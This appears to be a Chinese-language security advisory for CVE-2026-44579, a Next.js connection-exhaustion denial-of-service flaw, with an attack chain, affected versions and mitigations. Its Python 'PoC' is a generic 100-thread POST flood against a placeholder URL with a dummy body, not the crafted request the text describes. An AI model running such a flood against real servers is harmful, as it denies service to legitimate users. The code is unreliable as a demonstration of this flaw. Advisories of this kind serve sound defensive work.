CVE-2026-44579 CVSS 7.5 高危

CVE-2026-44579 Next.js连接耗尽拒绝服务漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44579

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Next.js

漏洞概述

Next.js框架在使用部分预渲染和缓存组件功能时存在高危漏洞。攻击者通过构造特定的POST请求，可触发服务器端的请求正文处理死锁。这将导致HTTP连接长时间占用，迅速耗尽系统文件描述符和服务器容量，致使合法用户无法访问服务，引发拒绝服务攻击。

技术细节

该漏洞主要影响启用了Partial Prerendering (PPR) 和 Cache Components特性的Next.js应用。漏洞源于Server Action处理请求体时的逻辑缺陷。当攻击者发送特制的POST请求时，会触发处理流程中的死锁，导致连接无法正常关闭。这些挂起的连接持续占用文件描述符，随着攻击请求的累积，服务器资源被耗尽，无法响应新的合法请求，从而导致服务拒绝。

攻击链分析

STEP 1

信息收集

攻击者识别使用Next.js框架并启用了Partial Prerendering的目标应用。

STEP 2

漏洞利用

攻击者向Server Action端点发送特制的POST请求，触发请求体处理死锁。

STEP 3

资源耗尽

死锁导致连接长时间保持打开状态，持续消耗服务器的文件描述符和内存资源。

STEP 4

拒绝服务

服务器资源耗尽，无法处理新的合法连接，导致服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading
import time

# Target URL (Replace with actual target)
target_url = "http://target-nextjs-app.com/api/action"

# Send malicious request to trigger deadlock
def send_attack():
    try:
        # Sending a crafted POST request
        # Adjust headers/body based on specific vulnerability requirements
        response = requests.post(target_url, data={"key": "value"}, timeout=10)
        print(f"Request sent, status: {response.status_code}")
    except Exception as e:
        print(f"Error: {e}")

# Launch multiple threads to exhaust connections
threads = []
for i in range(100):
    t = threading.Thread(target=send_attack)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

影响范围

Next.js < 15.5.16

Next.js < 16.2.5

防御指南

临时缓解措施

如无法立即升级，建议在应用网关或反向代理层配置严格的速率限制，限制单个IP的并发连接数和请求频率。同时监控服务器文件描述符使用情况，设置超时阈值自动重启异常进程。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表